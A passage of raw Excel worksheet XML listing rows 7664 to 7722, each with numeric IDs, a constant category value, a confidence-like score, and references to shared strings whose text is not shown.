      </c>
      <c r="G7664" t="s">
        <v>15164</v>
      </c>
      <c r="H7664" t="s">
        <v>15165</v>
      </c>
    </row>
    <row r="7665" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7665" s="1">
        <v>7663</v>
      </c>
      <c r="B7665">
        <v>7073</v>
      </c>
      <c r="C7665">
        <v>7073</v>
      </c>
      <c r="D7665">
        <v>4</v>
      </c>
      <c r="E7665">
        <v>0.99769997596740723</v>
      </c>
      <c r="F7665" t="s">
        <v>13461</v>
      </c>
      <c r="G7665" t="s">
        <v>15166</v>
      </c>
      <c r="H7665" t="s">
        <v>15167</v>
      </c>
    </row>
    <row r="7666" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7666" s="1">
        <v>7664</v>
      </c>
      <c r="B7666">
        <v>7072</v>
      </c>
      <c r="C7666">
        <v>7072</v>
      </c>
      <c r="D7666">
        <v>4</v>
      </c>
      <c r="E7666">
        <v>0.64539998769760132</v>
      </c>
      <c r="F7666" t="s">
        <v>13461</v>
      </c>
      <c r="G7666" t="s">
        <v>15168</v>
      </c>
      <c r="H7666" t="s">
        <v>15169</v>
      </c>
    </row>
    <row r="7667" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7667" s="1">
        <v>7665</v>
      </c>
      <c r="B7667">
        <v>1900</v>
      </c>
      <c r="C7667">
        <v>1900</v>
      </c>
      <c r="D7667">
        <v>4</v>
      </c>
      <c r="E7667">
        <v>0.67400002479553223</v>
      </c>
      <c r="F7667" t="s">
        <v>13461</v>
      </c>
      <c r="G7667" t="s">
        <v>15170</v>
      </c>
      <c r="H7667" t="s">
        <v>15171</v>
      </c>
    </row>
    <row r="7668" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7668" s="1">
        <v>7666</v>
      </c>
      <c r="B7668">
        <v>1930</v>
      </c>
      <c r="C7668">
        <v>1930</v>
      </c>
      <c r="D7668">
        <v>4</v>
      </c>
      <c r="E7668">
        <v>0.38850000500679022</v>
      </c>
      <c r="F7668" t="s">
        <v>13461</v>
      </c>
      <c r="G7668" t="s">
        <v>15172</v>
      </c>
      <c r="H7668" t="s">
        <v>15173</v>
      </c>
    </row>
    <row r="7669" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7669" s="1">
        <v>7667</v>
      </c>
      <c r="B7669">
        <v>1803</v>
      </c>
      <c r="C7669">
        <v>1803</v>
      </c>
      <c r="D7669">
        <v>4</v>
      </c>
      <c r="E7669">
        <v>0.88400000333786011</v>
      </c>
      <c r="F7669" t="s">
        <v>13461</v>
      </c>
      <c r="G7669" t="s">
        <v>15174</v>
      </c>
      <c r="H7669" t="s">
        <v>15175</v>
      </c>
    </row>
    <row r="7670" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7670" s="1">
        <v>7668</v>
      </c>
      <c r="B7670">
        <v>1790</v>
      </c>
      <c r="C7670">
        <v>1790</v>
      </c>
      <c r="D7670">
        <v>4</v>
      </c>
      <c r="E7670">
        <v>0.91519999504089355</v>
      </c>
      <c r="F7670" t="s">
        <v>13461</v>
      </c>
      <c r="G7670" t="s">
        <v>15176</v>
      </c>
      <c r="H7670" t="s">
        <v>15177</v>
      </c>
    </row>
    <row r="7671" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7671" s="1">
        <v>7669</v>
      </c>
      <c r="B7671">
        <v>7158</v>
      </c>
      <c r="C7671">
        <v>7158</v>
      </c>
      <c r="D7671">
        <v>4</v>
      </c>
      <c r="E7671">
        <v>0.49540001153945917</v>
      </c>
      <c r="F7671" t="s">
        <v>13461</v>
      </c>
      <c r="G7671" t="s">
        <v>15178</v>
      </c>
      <c r="H7671" t="s">
        <v>15179</v>
      </c>
    </row>
    <row r="7672" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7672" s="1">
        <v>7670</v>
      </c>
      <c r="B7672">
        <v>1669</v>
      </c>
      <c r="C7672">
        <v>1669</v>
      </c>
      <c r="D7672">
        <v>4</v>
      </c>
      <c r="E7672">
        <v>0.79019999504089355</v>
      </c>
      <c r="F7672" t="s">
        <v>13461</v>
      </c>
      <c r="G7672" t="s">
        <v>15180</v>
      </c>
      <c r="H7672" t="s">
        <v>15181</v>
      </c>
    </row>
    <row r="7673" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7673" s="1">
        <v>7671</v>
      </c>
      <c r="B7673">
        <v>7155</v>
      </c>
      <c r="C7673">
        <v>7155</v>
      </c>
      <c r="D7673">
        <v>4</v>
      </c>
      <c r="E7673">
        <v>0.9976000189781189</v>
      </c>
      <c r="F7673" t="s">
        <v>13461</v>
      </c>
      <c r="G7673" t="s">
        <v>15182</v>
      </c>
      <c r="H7673" t="s">
        <v>15183</v>
      </c>
    </row>
    <row r="7674" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7674" s="1">
        <v>7672</v>
      </c>
      <c r="B7674">
        <v>7154</v>
      </c>
      <c r="C7674">
        <v>7154</v>
      </c>
      <c r="D7674">
        <v>4</v>
      </c>
      <c r="E7674">
        <v>0.98420000076293945</v>
      </c>
      <c r="F7674" t="s">
        <v>13461</v>
      </c>
      <c r="G7674" t="s">
        <v>15184</v>
      </c>
      <c r="H7674" t="s">
        <v>15185</v>
      </c>
    </row>
    <row r="7675" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7675" s="1">
        <v>7673</v>
      </c>
      <c r="B7675">
        <v>1681</v>
      </c>
      <c r="C7675">
        <v>1681</v>
      </c>
      <c r="D7675">
        <v>4</v>
      </c>
      <c r="E7675">
        <v>0.50279998779296875</v>
      </c>
      <c r="F7675" t="s">
        <v>13461</v>
      </c>
      <c r="G7675" t="s">
        <v>15186</v>
      </c>
      <c r="H7675" t="s">
        <v>15187</v>
      </c>
    </row>
    <row r="7676" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7676" s="1">
        <v>7674</v>
      </c>
      <c r="B7676">
        <v>1684</v>
      </c>
      <c r="C7676">
        <v>1684</v>
      </c>
      <c r="D7676">
        <v>4</v>
      </c>
      <c r="E7676">
        <v>0.95829999446868896</v>
      </c>
      <c r="F7676" t="s">
        <v>13461</v>
      </c>
      <c r="G7676" t="s">
        <v>15188</v>
      </c>
      <c r="H7676" t="s">
        <v>15189</v>
      </c>
    </row>
    <row r="7677" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7677" s="1">
        <v>7675</v>
      </c>
      <c r="B7677">
        <v>1730</v>
      </c>
      <c r="C7677">
        <v>1730</v>
      </c>
      <c r="D7677">
        <v>4</v>
      </c>
      <c r="E7677">
        <v>0.57810002565383911</v>
      </c>
      <c r="F7677" t="s">
        <v>13461</v>
      </c>
      <c r="G7677" t="s">
        <v>15190</v>
      </c>
      <c r="H7677" t="s">
        <v>15191</v>
      </c>
    </row>
    <row r="7678" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7678" s="1">
        <v>7676</v>
      </c>
      <c r="B7678">
        <v>1735</v>
      </c>
      <c r="C7678">
        <v>1735</v>
      </c>
      <c r="D7678">
        <v>4</v>
      </c>
      <c r="E7678">
        <v>0.39109998941421509</v>
      </c>
      <c r="F7678" t="s">
        <v>13461</v>
      </c>
      <c r="G7678" t="s">
        <v>15192</v>
      </c>
      <c r="H7678" t="s">
        <v>15193</v>
      </c>
    </row>
    <row r="7679" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7679" s="1">
        <v>7677</v>
      </c>
      <c r="B7679">
        <v>1739</v>
      </c>
      <c r="C7679">
        <v>1739</v>
      </c>
      <c r="D7679">
        <v>4</v>
      </c>
      <c r="E7679">
        <v>0.39109998941421509</v>
      </c>
      <c r="F7679" t="s">
        <v>13461</v>
      </c>
      <c r="G7679" t="s">
        <v>15194</v>
      </c>
      <c r="H7679" t="s">
        <v>15193</v>
      </c>
    </row>
    <row r="7680" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7680" s="1">
        <v>7678</v>
      </c>
      <c r="B7680">
        <v>1794</v>
      </c>
      <c r="C7680">
        <v>1794</v>
      </c>
      <c r="D7680">
        <v>4</v>
      </c>
      <c r="E7680">
        <v>0.94059997797012329</v>
      </c>
      <c r="F7680" t="s">
        <v>13461</v>
      </c>
      <c r="G7680" t="s">
        <v>15195</v>
      </c>
      <c r="H7680" t="s">
        <v>15196</v>
      </c>
    </row>
    <row r="7681" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7681" s="1">
        <v>7679</v>
      </c>
      <c r="B7681">
        <v>1748</v>
      </c>
      <c r="C7681">
        <v>1748</v>
      </c>
      <c r="D7681">
        <v>4</v>
      </c>
      <c r="E7681">
        <v>0.99559998512268066</v>
      </c>
      <c r="F7681" t="s">
        <v>13461</v>
      </c>
      <c r="G7681" t="s">
        <v>15197</v>
      </c>
      <c r="H7681" t="s">
        <v>15198</v>
      </c>
    </row>
    <row r="7682" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7682" s="1">
        <v>7680</v>
      </c>
      <c r="B7682">
        <v>1760</v>
      </c>
      <c r="C7682">
        <v>1760</v>
      </c>
      <c r="D7682">
        <v>4</v>
      </c>
      <c r="E7682">
        <v>0.49239999055862432</v>
      </c>
      <c r="F7682" t="s">
        <v>13461</v>
      </c>
      <c r="G7682" t="s">
        <v>15199</v>
      </c>
      <c r="H7682" t="s">
        <v>15200</v>
      </c>
    </row>
    <row r="7683" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7683" s="1">
        <v>7681</v>
      </c>
      <c r="B7683">
        <v>1768</v>
      </c>
      <c r="C7683">
        <v>1768</v>
      </c>
      <c r="D7683">
        <v>4</v>
      </c>
      <c r="E7683">
        <v>0.50220000743865967</v>
      </c>
      <c r="F7683" t="s">
        <v>13461</v>
      </c>
      <c r="G7683" t="s">
        <v>15201</v>
      </c>
      <c r="H7683" t="s">
        <v>15202</v>
      </c>
    </row>
    <row r="7684" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7684" s="1">
        <v>7682</v>
      </c>
      <c r="B7684">
        <v>1773</v>
      </c>
      <c r="C7684">
        <v>1773</v>
      </c>
      <c r="D7684">
        <v>4</v>
      </c>
      <c r="E7684">
        <v>0.64560002088546753</v>
      </c>
      <c r="F7684" t="s">
        <v>13461</v>
      </c>
      <c r="G7684" t="s">
        <v>15203</v>
      </c>
      <c r="H7684" t="s">
        <v>15204</v>
      </c>
    </row>
    <row r="7685" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7685" s="1">
        <v>7683</v>
      </c>
      <c r="B7685">
        <v>7129</v>
      </c>
      <c r="C7685">
        <v>7129</v>
      </c>
      <c r="D7685">
        <v>4</v>
      </c>
      <c r="E7685">
        <v>0.59259998798370361</v>
      </c>
      <c r="F7685" t="s">
        <v>13461</v>
      </c>
      <c r="G7685" t="s">
        <v>15205</v>
      </c>
      <c r="H7685" t="s">
        <v>15206</v>
      </c>
    </row>
    <row r="7686" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7686" s="1">
        <v>7684</v>
      </c>
      <c r="B7686">
        <v>1774</v>
      </c>
      <c r="C7686">
        <v>1774</v>
      </c>
      <c r="D7686">
        <v>4</v>
      </c>
      <c r="E7686">
        <v>0.39309999346733088</v>
      </c>
      <c r="F7686" t="s">
        <v>13461</v>
      </c>
      <c r="G7686" t="s">
        <v>15207</v>
      </c>
      <c r="H7686" t="s">
        <v>15208</v>
      </c>
    </row>
    <row r="7687" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7687" s="1">
        <v>7685</v>
      </c>
      <c r="B7687">
        <v>1779</v>
      </c>
      <c r="C7687">
        <v>1779</v>
      </c>
      <c r="D7687">
        <v>4</v>
      </c>
      <c r="E7687">
        <v>0.97170001268386841</v>
      </c>
      <c r="F7687" t="s">
        <v>13461</v>
      </c>
      <c r="G7687" t="s">
        <v>15209</v>
      </c>
      <c r="H7687" t="s">
        <v>15210</v>
      </c>
    </row>
    <row r="7688" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7688" s="1">
        <v>7686</v>
      </c>
      <c r="B7688">
        <v>7123</v>
      </c>
      <c r="C7688">
        <v>7123</v>
      </c>
      <c r="D7688">
        <v>4</v>
      </c>
      <c r="E7688">
        <v>0.56470000743865967</v>
      </c>
      <c r="F7688" t="s">
        <v>13461</v>
      </c>
      <c r="G7688" t="s">
        <v>15211</v>
      </c>
      <c r="H7688" t="s">
        <v>15212</v>
      </c>
    </row>
    <row r="7689" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7689" s="1">
        <v>7687</v>
      </c>
      <c r="B7689">
        <v>1782</v>
      </c>
      <c r="C7689">
        <v>1782</v>
      </c>
      <c r="D7689">
        <v>4</v>
      </c>
      <c r="E7689">
        <v>0.95090001821517944</v>
      </c>
      <c r="F7689" t="s">
        <v>13461</v>
      </c>
      <c r="G7689" t="s">
        <v>15213</v>
      </c>
      <c r="H7689" t="s">
        <v>14065</v>
      </c>
    </row>
    <row r="7690" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7690" s="1">
        <v>7688</v>
      </c>
      <c r="B7690">
        <v>7117</v>
      </c>
      <c r="C7690">
        <v>7117</v>
      </c>
      <c r="D7690">
        <v>4</v>
      </c>
      <c r="E7690">
        <v>0.86479997634887695</v>
      </c>
      <c r="F7690" t="s">
        <v>13461</v>
      </c>
      <c r="G7690" t="s">
        <v>15214</v>
      </c>
      <c r="H7690" t="s">
        <v>15215</v>
      </c>
    </row>
    <row r="7691" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7691" s="1">
        <v>7689</v>
      </c>
      <c r="B7691">
        <v>1749</v>
      </c>
      <c r="C7691">
        <v>1749</v>
      </c>
      <c r="D7691">
        <v>4</v>
      </c>
      <c r="E7691">
        <v>0.56019997596740723</v>
      </c>
      <c r="F7691" t="s">
        <v>13461</v>
      </c>
      <c r="G7691" t="s">
        <v>15216</v>
      </c>
      <c r="H7691" t="s">
        <v>15217</v>
      </c>
    </row>
    <row r="7692" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7692" s="1">
        <v>7690</v>
      </c>
      <c r="B7692">
        <v>2109</v>
      </c>
      <c r="C7692">
        <v>2109</v>
      </c>
      <c r="D7692">
        <v>4</v>
      </c>
      <c r="E7692">
        <v>0.99290001392364502</v>
      </c>
      <c r="F7692" t="s">
        <v>13461</v>
      </c>
      <c r="G7692" t="s">
        <v>15218</v>
      </c>
      <c r="H7692" t="s">
        <v>15219</v>
      </c>
    </row>
    <row r="7693" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7693" s="1">
        <v>7691</v>
      </c>
      <c r="B7693">
        <v>1935</v>
      </c>
      <c r="C7693">
        <v>1935</v>
      </c>
      <c r="D7693">
        <v>4</v>
      </c>
      <c r="E7693">
        <v>0.46860000491142267</v>
      </c>
      <c r="F7693" t="s">
        <v>13461</v>
      </c>
      <c r="G7693" t="s">
        <v>15220</v>
      </c>
      <c r="H7693" t="s">
        <v>15221</v>
      </c>
    </row>
    <row r="7694" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7694" s="1">
        <v>7692</v>
      </c>
      <c r="B7694">
        <v>7068</v>
      </c>
      <c r="C7694">
        <v>7068</v>
      </c>
      <c r="D7694">
        <v>4</v>
      </c>
      <c r="E7694">
        <v>0.99479997158050537</v>
      </c>
      <c r="F7694" t="s">
        <v>13461</v>
      </c>
      <c r="G7694" t="s">
        <v>15222</v>
      </c>
      <c r="H7694" t="s">
        <v>15223</v>
      </c>
    </row>
    <row r="7695" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7695" s="1">
        <v>7693</v>
      </c>
      <c r="B7695">
        <v>7025</v>
      </c>
      <c r="C7695">
        <v>7025</v>
      </c>
      <c r="D7695">
        <v>4</v>
      </c>
      <c r="E7695">
        <v>0.84210002422332764</v>
      </c>
      <c r="F7695" t="s">
        <v>13461</v>
      </c>
      <c r="G7695" t="s">
        <v>15224</v>
      </c>
      <c r="H7695" t="s">
        <v>15225</v>
      </c>
    </row>
    <row r="7696" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7696" s="1">
        <v>7694</v>
      </c>
      <c r="B7696">
        <v>7021</v>
      </c>
      <c r="C7696">
        <v>7021</v>
      </c>
      <c r="D7696">
        <v>4</v>
      </c>
      <c r="E7696">
        <v>0.98760002851486206</v>
      </c>
      <c r="F7696" t="s">
        <v>13461</v>
      </c>
      <c r="G7696" t="s">
        <v>15226</v>
      </c>
      <c r="H7696" t="s">
        <v>15227</v>
      </c>
    </row>
    <row r="7697" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7697" s="1">
        <v>7695</v>
      </c>
      <c r="B7697">
        <v>7020</v>
      </c>
      <c r="C7697">
        <v>7020</v>
      </c>
      <c r="D7697">
        <v>4</v>
      </c>
      <c r="E7697">
        <v>0.99510002136230469</v>
      </c>
      <c r="F7697" t="s">
        <v>13461</v>
      </c>
      <c r="G7697" t="s">
        <v>15228</v>
      </c>
      <c r="H7697" t="s">
        <v>15229</v>
      </c>
    </row>
    <row r="7698" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7698" s="1">
        <v>7696</v>
      </c>
      <c r="B7698">
        <v>7019</v>
      </c>
      <c r="C7698">
        <v>7019</v>
      </c>
      <c r="D7698">
        <v>4</v>
      </c>
      <c r="E7698">
        <v>0.99739998579025269</v>
      </c>
      <c r="F7698" t="s">
        <v>13461</v>
      </c>
      <c r="G7698" t="s">
        <v>15230</v>
      </c>
      <c r="H7698" t="s">
        <v>15231</v>
      </c>
    </row>
    <row r="7699" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7699" s="1">
        <v>7697</v>
      </c>
      <c r="B7699">
        <v>7017</v>
      </c>
      <c r="C7699">
        <v>7017</v>
      </c>
      <c r="D7699">
        <v>4</v>
      </c>
      <c r="E7699">
        <v>0.92229998111724854</v>
      </c>
      <c r="F7699" t="s">
        <v>13461</v>
      </c>
      <c r="G7699" t="s">
        <v>15232</v>
      </c>
      <c r="H7699" t="s">
        <v>15233</v>
      </c>
    </row>
    <row r="7700" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7700" s="1">
        <v>7698</v>
      </c>
      <c r="B7700">
        <v>7016</v>
      </c>
      <c r="C7700">
        <v>7016</v>
      </c>
      <c r="D7700">
        <v>4</v>
      </c>
      <c r="E7700">
        <v>0.66360002756118774</v>
      </c>
      <c r="F7700" t="s">
        <v>13461</v>
      </c>
      <c r="G7700" t="s">
        <v>15234</v>
      </c>
      <c r="H7700" t="s">
        <v>15235</v>
      </c>
    </row>
    <row r="7701" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7701" s="1">
        <v>7699</v>
      </c>
      <c r="B7701">
        <v>7015</v>
      </c>
      <c r="C7701">
        <v>7015</v>
      </c>
      <c r="D7701">
        <v>4</v>
      </c>
      <c r="E7701">
        <v>0.56770002841949463</v>
      </c>
      <c r="F7701" t="s">
        <v>13461</v>
      </c>
      <c r="G7701" t="s">
        <v>15236</v>
      </c>
      <c r="H7701" t="s">
        <v>15237</v>
      </c>
    </row>
    <row r="7702" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7702" s="1">
        <v>7700</v>
      </c>
      <c r="B7702">
        <v>2047</v>
      </c>
      <c r="C7702">
        <v>2047</v>
      </c>
      <c r="D7702">
        <v>4</v>
      </c>
      <c r="E7702">
        <v>0.75180000066757202</v>
      </c>
      <c r="F7702" t="s">
        <v>13461</v>
      </c>
      <c r="G7702" t="s">
        <v>15238</v>
      </c>
      <c r="H7702" t="s">
        <v>14951</v>
      </c>
    </row>
    <row r="7703" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7703" s="1">
        <v>7701</v>
      </c>
      <c r="B7703">
        <v>2051</v>
      </c>
      <c r="C7703">
        <v>2051</v>
      </c>
      <c r="D7703">
        <v>4</v>
      </c>
      <c r="E7703">
        <v>0.62389999628067017</v>
      </c>
      <c r="F7703" t="s">
        <v>13461</v>
      </c>
      <c r="G7703" t="s">
        <v>15239</v>
      </c>
      <c r="H7703" t="s">
        <v>15240</v>
      </c>
    </row>
    <row r="7704" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7704" s="1">
        <v>7702</v>
      </c>
      <c r="B7704">
        <v>7027</v>
      </c>
      <c r="C7704">
        <v>7027</v>
      </c>
      <c r="D7704">
        <v>4</v>
      </c>
      <c r="E7704">
        <v>0.99639999866485596</v>
      </c>
      <c r="F7704" t="s">
        <v>13461</v>
      </c>
      <c r="G7704" t="s">
        <v>15241</v>
      </c>
      <c r="H7704" t="s">
        <v>15242</v>
      </c>
    </row>
    <row r="7705" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7705" s="1">
        <v>7703</v>
      </c>
      <c r="B7705">
        <v>2052</v>
      </c>
      <c r="C7705">
        <v>2052</v>
      </c>
      <c r="D7705">
        <v>4</v>
      </c>
      <c r="E7705">
        <v>0.78280001878738403</v>
      </c>
      <c r="F7705" t="s">
        <v>13461</v>
      </c>
      <c r="G7705" t="s">
        <v>15243</v>
      </c>
      <c r="H7705" t="s">
        <v>15125</v>
      </c>
    </row>
    <row r="7706" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7706" s="1">
        <v>7704</v>
      </c>
      <c r="B7706">
        <v>2057</v>
      </c>
      <c r="C7706">
        <v>2057</v>
      </c>
      <c r="D7706">
        <v>4</v>
      </c>
      <c r="E7706">
        <v>0.90609997510910034</v>
      </c>
      <c r="F7706" t="s">
        <v>13461</v>
      </c>
      <c r="G7706" t="s">
        <v>15244</v>
      </c>
      <c r="H7706" t="s">
        <v>15245</v>
      </c>
    </row>
    <row r="7707" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7707" s="1">
        <v>7705</v>
      </c>
      <c r="B7707">
        <v>2058</v>
      </c>
      <c r="C7707">
        <v>2058</v>
      </c>
      <c r="D7707">
        <v>4</v>
      </c>
      <c r="E7707">
        <v>0.99779999256134033</v>
      </c>
      <c r="F7707" t="s">
        <v>13461</v>
      </c>
      <c r="G7707" t="s">
        <v>15246</v>
      </c>
      <c r="H7707" t="s">
        <v>15247</v>
      </c>
    </row>
    <row r="7708" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7708" s="1">
        <v>7706</v>
      </c>
      <c r="B7708">
        <v>2061</v>
      </c>
      <c r="C7708">
        <v>2061</v>
      </c>
      <c r="D7708">
        <v>4</v>
      </c>
      <c r="E7708">
        <v>0.38530001044273382</v>
      </c>
      <c r="F7708" t="s">
        <v>13461</v>
      </c>
      <c r="G7708" t="s">
        <v>15248</v>
      </c>
      <c r="H7708" t="s">
        <v>15249</v>
      </c>
    </row>
    <row r="7709" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7709" s="1">
        <v>7707</v>
      </c>
      <c r="B7709">
        <v>2066</v>
      </c>
      <c r="C7709">
        <v>2066</v>
      </c>
      <c r="D7709">
        <v>4</v>
      </c>
      <c r="E7709">
        <v>0.99409997463226318</v>
      </c>
      <c r="F7709" t="s">
        <v>13461</v>
      </c>
      <c r="G7709" t="s">
        <v>15250</v>
      </c>
      <c r="H7709" t="s">
        <v>15251</v>
      </c>
    </row>
    <row r="7710" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7710" s="1">
        <v>7708</v>
      </c>
      <c r="B7710">
        <v>7000</v>
      </c>
      <c r="C7710">
        <v>7000</v>
      </c>
      <c r="D7710">
        <v>4</v>
      </c>
      <c r="E7710">
        <v>0.77319997549057007</v>
      </c>
      <c r="F7710" t="s">
        <v>13461</v>
      </c>
      <c r="G7710" t="s">
        <v>15252</v>
      </c>
      <c r="H7710" t="s">
        <v>15253</v>
      </c>
    </row>
    <row r="7711" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7711" s="1">
        <v>7709</v>
      </c>
      <c r="B7711">
        <v>2070</v>
      </c>
      <c r="C7711">
        <v>2070</v>
      </c>
      <c r="D7711">
        <v>4</v>
      </c>
      <c r="E7711">
        <v>0.47699999809265142</v>
      </c>
      <c r="F7711" t="s">
        <v>13461</v>
      </c>
      <c r="G7711" t="s">
        <v>15254</v>
      </c>
      <c r="H7711" t="s">
        <v>15255</v>
      </c>
    </row>
    <row r="7712" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7712" s="1">
        <v>7710</v>
      </c>
      <c r="B7712">
        <v>2079</v>
      </c>
      <c r="C7712">
        <v>2079</v>
      </c>
      <c r="D7712">
        <v>4</v>
      </c>
      <c r="E7712">
        <v>0.99800002574920654</v>
      </c>
      <c r="F7712" t="s">
        <v>13461</v>
      </c>
      <c r="G7712" t="s">
        <v>15256</v>
      </c>
      <c r="H7712" t="s">
        <v>15257</v>
      </c>
    </row>
    <row r="7713" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7713" s="1">
        <v>7711</v>
      </c>
      <c r="B7713">
        <v>2080</v>
      </c>
      <c r="C7713">
        <v>2080</v>
      </c>
      <c r="D7713">
        <v>4</v>
      </c>
      <c r="E7713">
        <v>0.82770001888275146</v>
      </c>
      <c r="F7713" t="s">
        <v>13461</v>
      </c>
      <c r="G7713" t="s">
        <v>15258</v>
      </c>
      <c r="H7713" t="s">
        <v>15259</v>
      </c>
    </row>
    <row r="7714" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7714" s="1">
        <v>7712</v>
      </c>
      <c r="B7714">
        <v>2105</v>
      </c>
      <c r="C7714">
        <v>2105</v>
      </c>
      <c r="D7714">
        <v>4</v>
      </c>
      <c r="E7714">
        <v>0.91259998083114624</v>
      </c>
      <c r="F7714" t="s">
        <v>13461</v>
      </c>
      <c r="G7714" t="s">
        <v>15260</v>
      </c>
      <c r="H7714" t="s">
        <v>15261</v>
      </c>
    </row>
    <row r="7715" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7715" s="1">
        <v>7713</v>
      </c>
      <c r="B7715">
        <v>2053</v>
      </c>
      <c r="C7715">
        <v>2053</v>
      </c>
      <c r="D7715">
        <v>4</v>
      </c>
      <c r="E7715">
        <v>0.78250002861022949</v>
      </c>
      <c r="F7715" t="s">
        <v>13461</v>
      </c>
      <c r="G7715" t="s">
        <v>15262</v>
      </c>
      <c r="H7715" t="s">
        <v>15125</v>
      </c>
    </row>
    <row r="7716" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7716" s="1">
        <v>7714</v>
      </c>
      <c r="B7716">
        <v>1937</v>
      </c>
      <c r="C7716">
        <v>1937</v>
      </c>
      <c r="D7716">
        <v>4</v>
      </c>
      <c r="E7716">
        <v>0.46849998831748962</v>
      </c>
      <c r="F7716" t="s">
        <v>13461</v>
      </c>
      <c r="G7716" t="s">
        <v>15263</v>
      </c>
      <c r="H7716" t="s">
        <v>15221</v>
      </c>
    </row>
    <row r="7717" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7717" s="1">
        <v>7715</v>
      </c>
      <c r="B7717">
        <v>2035</v>
      </c>
      <c r="C7717">
        <v>2035</v>
      </c>
      <c r="D7717">
        <v>4</v>
      </c>
      <c r="E7717">
        <v>0.694100022315979</v>
      </c>
      <c r="F7717" t="s">
        <v>13461</v>
      </c>
      <c r="G7717" t="s">
        <v>15264</v>
      </c>
      <c r="H7717" t="s">
        <v>15265</v>
      </c>
    </row>
    <row r="7718" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7718" s="1">
        <v>7716</v>
      </c>
      <c r="B7718">
        <v>2028</v>
      </c>
      <c r="C7718">
        <v>2028</v>
      </c>
      <c r="D7718">
        <v>4</v>
      </c>
      <c r="E7718">
        <v>0.86299997568130493</v>
      </c>
      <c r="F7718" t="s">
        <v>13461</v>
      </c>
      <c r="G7718" t="s">
        <v>15266</v>
      </c>
      <c r="H7718" t="s">
        <v>15267</v>
      </c>
    </row>
    <row r="7719" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7719" s="1">
        <v>7717</v>
      </c>
      <c r="B7719">
        <v>7066</v>
      </c>
      <c r="C7719">
        <v>7066</v>
      </c>
      <c r="D7719">
        <v>4</v>
      </c>
      <c r="E7719">
        <v>0.99849998950958252</v>
      </c>
      <c r="F7719" t="s">
        <v>13461</v>
      </c>
      <c r="G7719" t="s">
        <v>15268</v>
      </c>
      <c r="H7719" t="s">
        <v>15269</v>
      </c>
    </row>
    <row r="7720" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7720" s="1">
        <v>7718</v>
      </c>
      <c r="B7720">
        <v>1941</v>
      </c>
      <c r="C7720">
        <v>1941</v>
      </c>
      <c r="D7720">
        <v>4</v>
      </c>
      <c r="E7720">
        <v>0.62360000610351563</v>
      </c>
      <c r="F7720" t="s">
        <v>13461</v>
      </c>
      <c r="G7720" t="s">
        <v>15270</v>
      </c>
      <c r="H7720" t="s">
        <v>15271</v>
      </c>
    </row>
    <row r="7721" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7721" s="1">
        <v>7719</v>
      </c>
      <c r="B7721">
        <v>7063</v>
      </c>
      <c r="C7721">
        <v>7063</v>
      </c>
      <c r="D7721">
        <v>4</v>
      </c>
      <c r="E7721">
        <v>0.47670000791549683</v>
      </c>
      <c r="F7721" t="s">
        <v>13461</v>
      </c>
      <c r="G7721" t="s">
        <v>15272</v>
      </c>
      <c r="H7721" t="s">
        <v>15273</v>
      </c>
    </row>
    <row r="7722" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7722" s="1">
        <v>7720</v>
      </c>
      <c r="B7722">
        <v>1953</v>
      </c>
      <c r="C7722">
        <v>1953</v>
      </c>
      <c r="D7722">
        <v>4</v>
      </c>
      <c r="E7722">
        <v>0.97259998321533203</v>
      </c>
      <c r="F7722" t="s">
        <v>13461</v>
      </c>
      <c r="G7722" t="s">
        <v>15274</v>
      </c>
      <c r="H7722" t="s">
        <v>15275</v>
      </c>
    </row>
